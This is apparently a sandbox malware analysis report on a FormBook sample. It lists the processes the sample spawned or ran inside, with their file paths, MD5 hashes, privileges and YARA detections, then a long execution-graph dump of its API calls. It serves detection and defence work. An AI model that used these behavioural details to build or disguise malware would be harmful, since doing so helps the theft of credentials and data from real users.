                                                                      Start date:08/01/2025
                                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\KSts9xW7qy.exe"
                                                                      Imagebase:0xb0000
                                                                      File size:46'504 bytes
                                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:2
                                                                      Start time:10:12:27
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe"
                                                                      Imagebase:0x600000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:3
                                                                      Start time:10:12:30
                                                                      Start date:08/01/2025
                                                                      Path:C:\Windows\SysWOW64\winrs.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\SysWOW64\winrs.exe"
                                                                      Imagebase:0x3f0000
                                                                      File size:43'008 bytes
                                                                      MD5 hash:E6C1CE56E6729A0B077C0F2384726B30
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:5
                                                                      Start time:10:12:42
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe"
                                                                      Imagebase:0x600000
                                                                      File size:140'800 bytes
                                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:false

                                                                      Target ID:8
                                                                      Start time:10:12:54
                                                                      Start date:08/01/2025
                                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                      Imagebase:0x7ff6bf500000
                                                                      File size:676'768 bytes
                                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                        Execution Graph

                                                                        Execution Coverage:3.9%
                                                                        Dynamic/Decrypted Code Coverage:0.4%
                                                                        Signature Coverage:9.7%
                                                                        Total number of Nodes:1994
                                                                        Total number of Limit Nodes:42
93580 e91035 93580->93358 93581 e90fbf 94107 e96e10 8 API calls _raise 93581->94107 93583 e90fca 93583->93358 93584->93358 93585->93397 93587 e7bdfa 48 API calls 93586->93587 93588 e761b1 93587->93588 93588->93530 93654 e74214 93589->93654 93594 e741d4 LoadLibraryExW 93664 e74291 93594->93664 93595 ee4f73 93596 e74252 84 API calls 93595->93596 93598 ee4f7a 93596->93598 93600 e74291 3 API calls 93598->93600 93602 ee4f82 93600->93602 93690 e744ed 93602->93690 93603 e741fb 93603->93602 93604 e74207 93603->93604 93605 e74252 84 API calls 93604->93605 93607 e739fe 93605->93607 93607->93543 93613 ebc396 93607->93613 93610 ee4fa9 93698 e74950 93610->93698 93614 e74517 83 API calls 93613->93614 93615 ebc405 93614->93615 93876 ebc56d 93615->93876 93618 e744ed 64 API calls 93619 ebc432 93618->93619 93620 e744ed 64 API calls 93619->93620 93621 ebc442 93620->93621 93622 e744ed 64 API calls 93621->93622 93623 ebc45d 93622->93623 93624 e744ed 64 API calls 93623->93624 93625 ebc478 93624->93625 93626 e74517 83 API calls 93625->93626 93627 ebc48f 93626->93627 93628 e9395c _W_store_winword 47 API calls 93627->93628 93629 ebc496 93628->93629 93630 e9395c _W_store_winword 47 API calls 93629->93630 93631 ebc4a0 93630->93631 93632 e744ed 64 API calls 93631->93632 93633 ebc4b4 93632->93633 93634 ebbf5a GetSystemTimeAsFileTime 93633->93634 93635 ebc4c7 93634->93635 93636 ebc4dc 93635->93636 93637 ebc4f1 93635->93637 93638 e91c9d _free 47 API calls 93636->93638 93639 ebc4f7 93637->93639 93640 ebc556 93637->93640 93643 ebc4e2 93638->93643 93882 ebb965 118 API calls __fcloseall 93639->93882 93642 e91c9d _free 47 API calls 93640->93642 93647 ebc41b 93642->93647 93645 e91c9d _free 47 API calls 93643->93645 93644 ebc54e 93646 e91c9d _free 47 API calls 93644->93646 93645->93647 93646->93647 93647->93546 93648 e74252 93647->93648 93649 e7425c 93648->93649 93653 e74263 93648->93653 93883 e935e4 93649->93883 93651 e74283 FreeLibrary 93652 e74272 93651->93652 93652->93546 93653->93651 93653->93652 
93703 e74339 93654->93703 93657 e7423c 93659 e74244 FreeLibrary 93657->93659 93660 e741bb 93657->93660 93659->93660 93661 e93499 93660->93661 93711 e934ae 93661->93711 93663 e741c8 93663->93594 93663->93595 93790 e742e4 93664->93790 93667 e742b8 93668 e742c1 FreeLibrary 93667->93668 93669 e741ec 93667->93669 93668->93669 93671 e74380 93669->93671 93672 e8f4ea 48 API calls 93671->93672 93673 e74395 93672->93673 93674 e747b7 48 API calls 93673->93674 93675 e743a1 ___crtGetEnvironmentStringsW 93674->93675 93676 e743dc 93675->93676 93677 e744d1 93675->93677 93678 e74499 93675->93678 93679 e74950 57 API calls 93676->93679 93809 ebc750 93 API calls 93677->93809 93798 e7406b CreateStreamOnHGlobal 93678->93798 93682 e743e5 93679->93682 93683 e744ed 64 API calls 93682->93683 93684 e74479 93682->93684 93686 ee4ed7 93682->93686 93804 e74517 93682->93804 93683->93682 93684->93603 93687 e74517 83 API calls 93686->93687 93688 ee4eeb 93687->93688 93689 e744ed 64 API calls 93688->93689 93689->93684 93691 e744ff 93690->93691 93692 ee4fc0 93690->93692 93833 e9381e 93691->93833 93695 ebbf5a 93853 ebbdb4 93695->93853 93697 ebbf70 93697->93610 93699 e7495f 93698->93699 93700 ee5002 93698->93700 93858 e93e65 93699->93858 93702 e74967 93707 e7434b 93703->93707 93706 e74321 LoadLibraryA GetProcAddress 93706->93657 93708 e7422f 93707->93708 93709 e74354 LoadLibraryA 93707->93709 93708->93657 93708->93706 93709->93708 93710 e74365 GetProcAddress 93709->93710 93710->93708 93713 e934ba _raise 93711->93713 93712 e934cd 93759 e97c0e 47 API calls __getptd_noexit 93712->93759 93713->93712 93716 e934fe 93713->93716 93715 e934d2 93760 e96e10 8 API calls _raise 93715->93760 93730 e9e4c8 93716->93730 93719 e93503 93720 e93519 93719->93720 93721 e9350c 93719->93721 93722 e93543 93720->93722 93723 e93523 93720->93723 93761 e97c0e 47 API calls __getptd_noexit 93721->93761 93744 e9e5e0 93722->93744 93762 e97c0e 47 API calls __getptd_noexit 93723->93762 93727 e934dd _raise @_EH4_CallFilterFunc@8 
93727->93663 93731 e9e4d4 _raise 93730->93731 93732 e97cf4 __lock 47 API calls 93731->93732 93742 e9e4e2 93732->93742 93733 e9e559 93769 e969d0 47 API calls _W_store_winword 93733->93769 93734 e9e552 93764 e9e5d7 93734->93764 93737 e9e5cc _raise 93737->93719 93738 e9e560 93738->93734 93739 e9e56f InitializeCriticalSectionAndSpinCount EnterCriticalSection 93738->93739 93739->93734 93740 e97d7c __mtinitlocknum 47 API calls 93740->93742 93742->93733 93742->93734 93742->93740 93767 e94e5b 48 API calls __lock 93742->93767 93768 e94ec5 LeaveCriticalSection LeaveCriticalSection _doexit 93742->93768 93753 e9e600 __wopenfile 93744->93753 93745 e9e61a 93774 e97c0e 47 API calls __getptd_noexit 93745->93774 93747 e9e7d5 93747->93745 93751 e9e838 93747->93751 93748 e9e61f 93775 e96e10 8 API calls _raise 93748->93775 93750 e9354e 93763 e93570 LeaveCriticalSection LeaveCriticalSection _fseek 93750->93763 93771 ea63c9 93751->93771 93753->93745 93753->93747 93753->93753 93776 e9185b 59 API calls 2 library calls 93753->93776 93755 e9e7ce 93755->93747 93777 e9185b 59 API calls 2 library calls 93755->93777 93757 e9e7ed 93757->93747 93778 e9185b 59 API calls 2 library calls 93757->93778 93759->93715 93760->93727 93761->93727 93762->93727 93763->93727 93770 e97e58 LeaveCriticalSection 93764->93770 93766 e9e5de 93766->93737 93767->93742 93768->93742 93769->93738 93770->93766 93779 ea5bb1 93771->93779 93773 ea63e2 93773->93750 93774->93748 93775->93750 93776->93755 93777->93757 93778->93747 93782 ea5bbd _raise 93779->93782 93780 ea5bcf 93781 e97c0e _raise 47 API calls 93780->93781 93783 ea5bd4 93781->93783 93782->93780 93784 ea5c06 93782->93784 93785 e96e10 _raise 8 API calls 93783->93785 93786 ea5c78 __wsopen_helper 110 API calls 93784->93786 93789 ea5bde _raise 93785->93789 93787 ea5c23 93786->93787 93788 ea5c4c __wsopen_helper LeaveCriticalSection 93787->93788 93788->93789 93789->93773 93794 e742f6 93790->93794 93793 e742cc LoadLibraryA GetProcAddress 93793->93667 93795 e742aa 
93794->93795 93796 e742ff LoadLibraryA 93794->93796 93795->93667 93795->93793 93796->93795 93797 e74310 GetProcAddress 93796->93797 93797->93795 93799 e74085 FindResourceExW 93798->93799 93800 e740a2 93798->93800 93799->93800 93801 ee4f16 LoadResource 93799->93801 93800->93676 93801->93800 93802 ee4f2b SizeofResource 93801->93802 93802->93800 93803 ee4f3f LockResource 93802->93803 93803->93800 93805 e74526 93804->93805 93806 ee4fe0 93804->93806 93810 e93a8d 93805->93810 93808 e74534 93808->93682 93809->93676 93811 e93a99 _raise 93810->93811 93812 e93aa7 93811->93812 93813 e93acd 93811->93813 93823 e97c0e 47 API calls __getptd_noexit 93812->93823 93825 e94e1c 93813->93825 93816 e93aac 93824 e96e10 8 API calls _raise 93816->93824 93820 e93ae2 93832 e93b04 LeaveCriticalSection LeaveCriticalSection _fseek 93820->93832 93822 e93ab7 _raise 93822->93808 93823->93816 93824->93822 93826 e94e2c 93825->93826 93827 e94e4e EnterCriticalSection 93825->93827 93826->93827 93828 e94e34 93826->93828 93829 e93ad3 93827->93829 93830 e97cf4 __lock 47 API calls 93828->93830 93831 e939fe 81 API calls 4 library calls 93829->93831 93830->93829 93831->93820 93832->93822 93836 e93839 93833->93836 93835 e74510 93835->93695 93837 e93845 _raise 93836->93837 93838 e93888 93837->93838 93839 e9385b _memset 93837->93839 93840 e93880 _raise 93837->93840 93841 e94e1c __lock_file 48 API calls 93838->93841 93849 e97c0e 47 API calls __getptd_noexit 93839->93849 93840->93835 93842 e9388e 93841->93842 93851 e9365b 62 API calls 5 library calls 93842->93851 93845 e93875 93850 e96e10 8 API calls _raise 93845->93850 93846 e938a4 93852 e938c2 LeaveCriticalSection LeaveCriticalSection _fseek 93846->93852 93849->93845 93850->93840 93851->93846 93852->93840 93856 e9344a GetSystemTimeAsFileTime 93853->93856 93855 ebbdc3 93855->93697 93857 e93478 __aulldiv 93856->93857 93857->93855 93859 e93e71 _raise 93858->93859 93860 e93e7f 93859->93860 93861 e93e94 93859->93861 93872 e97c0e 47 API calls __getptd_noexit 
93860->93872 93863 e94e1c __lock_file 48 API calls 93861->93863 93864 e93e9a 93863->93864 93874 e93b0c 55 API calls 6 library calls 93864->93874 93865 e93e84 93873 e96e10 8 API calls _raise 93865->93873 93868 e93ea5 93875 e93ec5 LeaveCriticalSection LeaveCriticalSection _fseek 93868->93875 93870 e93eb7 93871 e93e8f _raise 93870->93871 93871->93702 93872->93865 93873->93871 93874->93868 93875->93870 93877 ebc581 __tzset_nolock _wcscmp 93876->93877 93878 e744ed 64 API calls 93877->93878 93879 ebc417 93877->93879 93880 ebbf5a GetSystemTimeAsFileTime 93877->93880 93881 e74517 83 API calls 93877->93881 93878->93877 93879->93618 93879->93647 93880->93877 93881->93877 93882->93644 93884 e935f0 _raise 93883->93884 93885 e9361c 93884->93885 93886 e93604 93884->93886 93889 e94e1c __lock_file 48 API calls 93885->93889 93892 e93614 _raise 93885->93892 93912 e97c0e 47 API calls __getptd_noexit 93886->93912 93888 e93609 93913 e96e10 8 API calls _raise 93888->93913 93891 e9362e 93889->93891 93896 e93578 93891->93896 93892->93653 93897 e9359b 93896->93897 93898 e93587 93896->93898 93902 e93597 93897->93902 93915 e92c84 93897->93915 93955 e97c0e 47 API calls __getptd_noexit 93898->93955 93901 e9358c 93956 e96e10 8 API calls _raise 93901->93956 93914 e93653 LeaveCriticalSection LeaveCriticalSection _fseek 93902->93914 93908 e935b5 93932 e9e9d2 93908->93932 93910 e935bb 93910->93902 93911 e91c9d _free 47 API calls 93910->93911 93911->93902 93912->93888 93913->93892 93914->93892 93916 e92c97 93915->93916 93920 e92cbb 93915->93920 93917 e92933 __flush 47 API calls 93916->93917 93916->93920 93918 e92cb4 93917->93918 93957 e9af61 93918->93957 93921 e9eb36 93920->93921 93922 e935af 93921->93922 93923 e9eb43 93921->93923 93925 e92933 93922->93925 93923->93922 93924 e91c9d _free 47 API calls 93923->93924 93924->93922 93926 e9293d 93925->93926 93927 e92952 93925->93927 94063 e97c0e 47 API calls __getptd_noexit 93926->94063 93927->93908 93929 e92942 94064 e96e10 8 API calls _raise 
93929->94064 93931 e9294d 93931->93908 93933 e9e9de _raise 93932->93933 93934 e9e9fe 93933->93934 93935 e9e9e6 93933->93935 93936 e9ea7b 93934->93936 93941 e9ea28 93934->93941 94080 e97bda 47 API calls __getptd_noexit 93935->94080 94084 e97bda 47 API calls __getptd_noexit 93936->94084 93939 e9e9eb 94081 e97c0e 47 API calls __getptd_noexit 93939->94081 93940 e9ea80 94085 e97c0e 47 API calls __getptd_noexit 93940->94085 93944 e9a8ed ___lock_fhandle 49 API calls 93941->93944 93947 e9ea2e 93944->93947 93945 e9e9f3 _raise 93945->93910 93946 e9ea88 94086 e96e10 8 API calls _raise 93946->94086 93949 e9ea4c 93947->93949 93950 e9ea41 93947->93950 94082 e97c0e 47 API calls __getptd_noexit 93949->94082 94065 e9ea9c 93950->94065 93953 e9ea47 94083 e9ea73 LeaveCriticalSection __unlock_fhandle 93953->94083 93955->93901 93956->93902 93958 e9af6d _raise 93957->93958 93959 e9af8d 93958->93959 93960 e9af75 93958->93960 93962 e9b022 93959->93962 93966 e9afbf 93959->93966 94055 e97bda 47 API calls __getptd_noexit 93960->94055 94060 e97bda 47 API calls __getptd_noexit 93962->94060 93963 e9af7a 94056 e97c0e 47 API calls __getptd_noexit 93963->94056 93965 e9b027 94061 e97c0e 47 API calls __getptd_noexit 93965->94061 93982 e9a8ed 93966->93982 93970 e9af82 _raise 93970->93920 93971 e9b02f 94062 e96e10 8 API calls _raise 93971->94062 93972 e9afc5 93974 e9afd8 93972->93974 93975 e9afeb 93972->93975 93991 e9b043 93974->93991 94057 e97c0e 47 API calls __getptd_noexit 93975->94057 93978 e9aff0 94058 e97bda 47 API calls __getptd_noexit 93978->94058 93979 e9afe4 94059 e9b01a LeaveCriticalSection __unlock_fhandle 93979->94059 93983 e9a8f9 _raise 93982->93983 93984 e9a946 EnterCriticalSection 93983->93984 93985 e97cf4 __lock 47 API calls 93983->93985 93986 e9a96c _raise 93984->93986 93987 e9a91d 93985->93987 93986->93972 93988 e9a928 InitializeCriticalSectionAndSpinCount 93987->93988 93989 e9a93a 93987->93989 93988->93989 93990 e9a970 ___lock_fhandle LeaveCriticalSection 93989->93990 93990->93984 
93992 e9b050 __ftell_nolock 93991->93992 93993 e9b08d 93992->93993 93994 e9b0ac 93992->93994 94024 e9b082 93992->94024 93995 e97bda __dosmaperr 47 API calls 93993->93995 93998 e9b105 93994->93998 93999 e9b0e9 93994->93999 93997 e9b092 93995->93997 93996 e9a70c __woutput_l 6 API calls 94000 e9b86b 93996->94000 94001 e97c0e _raise 47 API calls 93997->94001 94002 e9b11c 93998->94002 94005 e9f82f __lseeki64_nolock 49 API calls 93998->94005 94003 e97bda __dosmaperr 47 API calls 93999->94003 94000->93979 94004 e9b099 94001->94004 94006 ea3bf2 __stbuf 47 API calls 94002->94006 94007 e9b0ee 94003->94007 94008 e96e10 _raise 8 API calls 94004->94008 94005->94002 94009 e9b12a 94006->94009 94010 e97c0e _raise 47 API calls 94007->94010 94008->94024 94011 e9b44b 94009->94011 94017 e97a0d _wcstok 47 API calls 94009->94017 94012 e9b0f5 94010->94012 94013 e9b7b8 WriteFile 94011->94013 94014 e9b463 94011->94014 94015 e96e10 _raise 8 API calls 94012->94015 94016 e9b7e1 GetLastError 94013->94016 94026 e9b410 94013->94026 94018 e9b55a 94014->94018 94023 e9b479 94014->94023 94015->94024 94016->94026 94019 e9b150 GetConsoleMode 94017->94019 94029 e9b663 94018->94029 94032 e9b565 94018->94032 94019->94011 94021 e9b189 94019->94021 94020 e9b81b 94020->94024 94025 e97c0e _raise 47 API calls 94020->94025 94021->94011 94027 e9b199 GetConsoleCP 94021->94027 94022 e9b4e9 WriteFile 94022->94016 94028 e9b526 94022->94028 94023->94020 94023->94022 94024->93996 94030 e9b843 94025->94030 94026->94020 94026->94024 94031 e9b7f7 94026->94031 94027->94026 94049 e9b1c2 94027->94049 94028->94023 94028->94026 94040 e9b555 94028->94040 94029->94020 94033 e9b6d8 WideCharToMultiByte 94029->94033 94034 e97bda __dosmaperr 47 API calls 94030->94034 94035 e9b7fe 94031->94035 94036 e9b812 94031->94036 94032->94020 94037 e9b5de WriteFile 94032->94037 94033->94016 94047 e9b71f 94033->94047 94034->94024 94041 e97c0e _raise 47 API calls 94035->94041 94038 e97bed __dosmaperr 47 API calls 94036->94038 94037->94016 94039 
e9b62d 94037->94039 94038->94024 94039->94026 94039->94032 94039->94040 94040->94026 94043 e9b803 94041->94043 94042 e9b727 WriteFile 94045 e9b77a GetLastError 94042->94045 94042->94047 94046 e97bda __dosmaperr 47 API calls 94043->94046 94044 e91688 __chsize_nolock 57 API calls 94044->94049 94045->94047 94046->94024 94047->94026 94047->94029 94047->94040 94047->94042 94048 ea40f7 59 API calls __chsize_nolock 94048->94049 94049->94026 94049->94044 94049->94048 94050 e9b28f WideCharToMultiByte 94049->94050 94051 e9b2f6 94049->94051 94050->94026 94052 e9b2ca WriteFile 94050->94052 94051->94016 94051->94026 94051->94049 94053 ea5884 WriteConsoleW CreateFileW __chsize_nolock 94051->94053 94054 e9b321 WriteFile 94051->94054 94052->94016 94052->94051 94053->94051 94054->94016 94054->94051 94055->93963 94056->93970 94057->93978 94058->93979 94059->93970 94060->93965 94061->93971 94062->93970 94063->93929 94064->93931 94087 e9aba4 94065->94087 94067 e9eb00 94100 e9ab1e 48 API calls 2 library calls 94067->94100 94069 e9eaaa 94069->94067 94071 e9aba4 __lseeki64_nolock 47 API calls 94069->94071 94079 e9eade 94069->94079 94070 e9aba4 __lseeki64_nolock 47 API calls 94072 e9eaea CloseHandle 94070->94072 94075 e9ead5 94071->94075 94072->94067 94077 e9eaf6 GetLastError 94072->94077 94073 e9eb2a 94073->93953 94074 e9eb08 94074->94073 94101 e97bed 47 API calls 2 library calls 94074->94101 94076 e9aba4 __lseeki64_nolock 47 API calls 94075->94076 94076->94079 94077->94067 94079->94067 94079->94070 94080->93939 94081->93945 94082->93953 94083->93945 94084->93940 94085->93946 94086->93945 94088 e9abaf 94087->94088 94089 e9abc4 94087->94089 94090 e97bda __dosmaperr 47 API calls 94088->94090 94092 e97bda __dosmaperr 47 API calls 94089->94092 94094 e9abe9 94089->94094 94091 e9abb4 94090->94091 94093 e97c0e _raise 47 API calls 94091->94093 94095 e9abf3 94092->94095 94096 e9abbc 94093->94096 94094->94069 94097 e97c0e _raise 47 API calls 94095->94097 94096->94069 94098 e9abfb 94097->94098 
94099 e96e10 _raise 8 API calls 94098->94099 94099->94096 94100->94074 94101->94073 94102->93557 94103->93568 94104->93568 94105->93562 94106->93581 94107->93583 94108->93580 94110 e9f8a0 __ftell_nolock 94109->94110 94111 e740b4 GetLongPathNameW 94110->94111 94112 e76a63 48 API calls 94111->94112 94113 e740dc 94112->94113 94114 e749a0 94113->94114 94115 e7d7f7 48 API calls 94114->94115 94116 e749b2 94115->94116 94117 e7660f 49 API calls 94116->94117 94118 e749bd 94117->94118 94119 ee2e35 94118->94119 94120 e749c8 94118->94120 94125 ee2e4f 94119->94125 94167 e8d35e 60 API calls 94119->94167 94121 e764cf 48 API calls 94120->94121 94123 e749d4 94121->94123 94161 e728a6 94123->94161 94126 e749e7 Mailbox 94126->93413 94128 e741a9 136 API calls 94127->94128 94129 e7415e 94128->94129 94130 ee3489 94129->94130 94131 e741a9 136 API calls 94129->94131 94132 ebc396 122 API calls 94130->94132 94133 e74172 94131->94133 94134 ee349e 94132->94134 94133->94130 94135 e7417a 94133->94135 94136 ee34bf 94134->94136 94137 ee34a2 94134->94137 94139 e74186 94135->94139 94140 ee34aa 94135->94140 94138 e8f4ea 48 API calls 94136->94138 94141 e74252 84 API calls 94137->94141 94160 ee3504 Mailbox 94138->94160 94168 e7c833 94139->94168 94256 eb6b49 87 API calls _wprintf 94140->94256 94141->94140 94144 ee34b8 94144->94136 94146 ee36b4 94147 e91c9d _free 47 API calls 94146->94147 94148 ee36bc 94147->94148 94149 e74252 84 API calls 94148->94149 94150 ee36c5 94149->94150 94154 e91c9d _free 47 API calls 94150->94154 94155 e74252 84 API calls 94150->94155 94262 eb25b5 86 API calls 4 library calls 94150->94262 94154->94150 94155->94150 94157 e7ce19 48 API calls 94157->94160 94160->94146 94160->94150 94160->94157 94257 eb2551 48 API calls ___crtGetEnvironmentStringsW 94160->94257 94258 eb2472 60 API calls 2 library calls 94160->94258 94259 eb9c12 48 API calls 94160->94259 94260 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94160->94260 94261 e74dd9 48 API calls 94160->94261 94162 e728b8 
94161->94162 94166 e728d7 ___crtGetEnvironmentStringsW 94161->94166 94164 e8f4ea 48 API calls 94162->94164 94163 e8f4ea 48 API calls 94165 e728ee 94163->94165 94164->94166 94165->94126 94166->94163 94167->94119 94169 e7c843 __ftell_nolock 94168->94169 94170 e7c860 94169->94170 94171 ee3095 94169->94171 94268 e748ba 49 API calls 94170->94268 94287 eb25b5 86 API calls 4 library calls 94171->94287 94174 ee30a8 94288 eb25b5 86 API calls 4 library calls 94174->94288 94175 e7c882 94269 e74550 56 API calls 94175->94269 94177 e7c897 94177->94174 94179 e7c89f 94177->94179 94181 e7d7f7 48 API calls 94179->94181 94180 ee30c4 94183 e7c90c 94180->94183 94182 e7c8ab 94181->94182 94270 e8e968 49 API calls __ftell_nolock 94182->94270 94185 ee30d7 94183->94185 94186 e7c91a 94183->94186 94189 e74907 CloseHandle 94185->94189 94273 e91dfc 94186->94273 94187 e7c8b7 94190 e7d7f7 48 API calls 94187->94190 94191 ee30e3 94189->94191 94192 e7c8c3 94190->94192 94193 e741a9 136 API calls 94191->94193 94194 e7660f 49 API calls 94192->94194 94195 ee310d 94193->94195 94196 e7c8d1 94194->94196 94199 ee3136 94195->94199 94203 ebc396 122 API calls 94195->94203 94271 e8eb66 SetFilePointerEx ReadFile 94196->94271 94198 e7c943 _wcscat _wcscpy 94202 e7c96d SetCurrentDirectoryW 94198->94202 94289 eb25b5 86 API calls 4 library calls 94199->94289 94200 e7c8fd 94272 e746ce SetFilePointerEx SetFilePointerEx 94200->94272 94206 e8f4ea 48 API calls 94202->94206 94207 ee3129 94203->94207 94205 ee314d 94215 e7cad1 Mailbox 94205->94215 94208 e7c988 94206->94208 94209 ee3152 94207->94209 94210 ee3131 94207->94210 94213 e747b7 48 API calls 94208->94213 94212 e74252 84 API calls 94209->94212 94211 e74252 84 API calls 94210->94211 94211->94199 94214 ee3157 94212->94214 94228 e7c993 Mailbox __NMSG_WRITE 94213->94228 94216 e8f4ea 48 API calls 94214->94216 94263 e748dd 94215->94263 94223 ee3194 94216->94223 94217 e7ca9d 94283 e74907 94217->94283 94221 e73d98 94221->93287 94221->93310 94290 e7ba85 48 API calls 
___crtGetEnvironmentStringsW 94223->94290 94227 ee33ce 94296 eb9b72 48 API calls 94227->94296 94228->94217 94236 ee345f 94228->94236 94239 e7ce19 48 API calls 94228->94239 94242 ee3467 94228->94242 94276 e7b337 56 API calls _wcscpy 94228->94276 94277 e8c258 GetStringTypeW 94228->94277 94278 e7cb93 59 API calls __wcsnicmp 94228->94278 94279 e7cb5a GetStringTypeW __NMSG_WRITE 94228->94279 94280 e916d0 GetStringTypeW __towlower_l 94228->94280 94281 e7cc24 162 API calls 3 library calls 94228->94281 94282 e8c682 48 API calls 94228->94282 94232 ee3480 94232->94217 94233 ee33f0 94297 ed29e8 48 API calls ___crtGetEnvironmentStringsW 94233->94297 94235 ee33fd 94237 e91c9d _free 47 API calls 94235->94237 94299 eb240b 48 API calls 3 library calls 94236->94299 94237->94215 94239->94228 94300 eb25b5 86 API calls 4 library calls 94242->94300 94247 e7ce19 48 API calls 94252 ee31dd Mailbox 94247->94252 94250 ee3420 94298 eb25b5 86 API calls 4 library calls 94250->94298 94252->94227 94252->94247 94252->94250 94291 eb2551 48 API calls ___crtGetEnvironmentStringsW 94252->94291 94292 eb2472 60 API calls 2 library calls 94252->94292 94293 eb9c12 48 API calls 94252->94293 94294 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94252->94294 94295 e8c682 48 API calls 94252->94295 94253 ee3439 94254 e91c9d _free 47 API calls 94253->94254 94255 ee344c 94254->94255 94255->94215 94256->94144 94257->94160 94258->94160 94259->94160 94260->94160 94261->94160 94262->94150 94264 e74907 CloseHandle 94263->94264 94265 e748e5 Mailbox 94264->94265 94266 e74907 CloseHandle 94265->94266 94267 e748fc 94266->94267 94267->94221 94268->94175 94269->94177 94270->94187 94271->94200 94272->94183 94301 e91e46 94273->94301 94276->94228 94277->94228 94278->94228 94279->94228 94280->94228 94281->94228 94282->94228 94284 e74911 SetCurrentDirectoryW 94283->94284 94285 e74920 94283->94285 94284->94215 94285->94284 94286 e74925 CloseHandle 94285->94286 94286->94284 94287->94174 94288->94180 94289->94205 94290->94252 
94291->94252 94292->94252 94293->94252 94294->94252 94295->94252 94296->94233 94297->94235 94298->94253 94299->94242 94300->94232 94302 e91e61 94301->94302 94305 e91e55 94301->94305 94325 e97c0e 47 API calls __getptd_noexit 94302->94325 94304 e92019 94310 e91e41 94304->94310 94326 e96e10 8 API calls _raise 94304->94326 94305->94302 94316 e91ed4 94305->94316 94320 e99d6b 47 API calls _raise 94305->94320 94308 e91fa0 94308->94302 94308->94310 94311 e91fb0 94308->94311 94309 e91f5f 94309->94302 94312 e91f7b 94309->94312 94322 e99d6b 47 API calls _raise 94309->94322 94310->94198 94324 e99d6b 47 API calls _raise 94311->94324 94312->94302 94312->94310 94315 e91f91 94312->94315 94323 e99d6b 47 API calls _raise 94315->94323 94316->94302 94319 e91f41 94316->94319 94321 e99d6b 47 API calls _raise 94316->94321 94319->94308 94319->94309 94320->94316 94321->94319 94322->94312 94323->94310 94324->94310 94325->94304 94326->94310 94328 e74d94 94327->94328 94329 e74c8b 94327->94329 94328->93419 94329->94328 94330 e8f4ea 48 API calls 94329->94330 94331 e74cb2 94330->94331 94332 e8f4ea 48 API calls 94331->94332 94337 e74d22 94332->94337 94337->94328 94340 e7b470 94337->94340 94368 e74dd9 48 API calls 94337->94368 94369 eb9af1 48 API calls 94337->94369 94370 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94337->94370 94338->93422 94339->93424 94371 e76b0f 94340->94371 94342 e7b69b 94378 e7ba85 48 API calls ___crtGetEnvironmentStringsW 94342->94378 94344 e7b6b5 Mailbox 94344->94337 94347 ee397b 94382 eb26bc 88 API calls 4 library calls 94347->94382 94348 e7bcce 48 API 